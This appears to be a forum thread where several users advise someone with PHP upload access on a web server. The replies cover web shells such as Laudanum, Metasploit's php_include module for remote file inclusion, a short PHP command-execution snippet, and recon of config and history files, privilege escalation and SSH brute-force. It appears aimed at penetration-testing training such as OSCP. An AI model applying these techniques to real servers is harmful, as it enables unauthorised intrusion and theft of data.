Check out http://sourceforge.net/projects/laudanum/ . They have some things that will do what you want. There are also some cleansed versions of what the evil folks out there are using. They have some advanced functionality such as ability to escalate privileges, deal with databases, etc.

Then, there's a fun one. If you can turn it into a remote file injection, metasploit has a payload (exploit/unix/webapp/php_include) that will allow you to inject a php meterpreter. It may be injectable on it's own, but you can then route traffic through that php file and do further enumeration, scanning, and ssh brute-force in order to get what you want. And of course, you will have a shell, so you can do most of what you're looking for.

Alrighty now... Kungfunix time... You have write access but it is likely you are restricted because of the type of user/group on the server (e.g., apache:wheel) so your first goals would be to perform recon on the machine. If you can run the script you posted:

Code:

<?php$output = `ls -al`;echo "<pre>$output</pre>";?>

Then you should think about getting the following information to use for later tasks:

ME... What I like to do is look for configs from time to time, they yield a lot of information as do *_history files when available. I personally would try to get as much information as I could in order to launch a targeted attack with SPECIFICS for that system. For example, so what you can upload and run applications to the server, you will likely still need to escalate in order to truly accomplish anything.

By focusing on the information (uname -a/version, etc.) you gain a better view of what you're up against so you can upload a focused exploit which will save you time, headaches, etc. Anyhow, my point is... You has semi-root... Now what? If this is for the OSCP, OSCE, CPT, CEPT, chances are there is something exploitable left for you to find. Can you gather usernames, groups, anyone crisscross groups? Anything out of the ordinary permissions-wise?

Think like an administrator for a moment and then an attacker. "Why am I running this server, who needs to access it, what do I need to potentially HIDE from prying eyes..." This should include directories with obscure names, e.g. TMP, TEMP, .TEMP and so on. Don't forget the spaces For example, on a term do a mkdir " " followed by an ls you'll see no directory. On the system itself with a window manager you will see a directory, but on terminal its blanked out so don't forget to search extensively.

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

I don't understand (and I can't test it right now...). What is the vulnerability being exploited? You need a "Remote File Include" vulnerability?

keep it simple and keep it secure. this lil 2 second write up executes commands and checks for the proper ip b4 executing them. Use 'wget' or 'fetch' to grab files remotely, and use uname -a to get system info. Just pass the commands to the text box like any other unix command. If shell_exec is disabled, try eval(), or system(), or the back ticks `` to execute commands.

If you attempt and RFI with this, just name it as a txt file and include it in the script you're exploiting.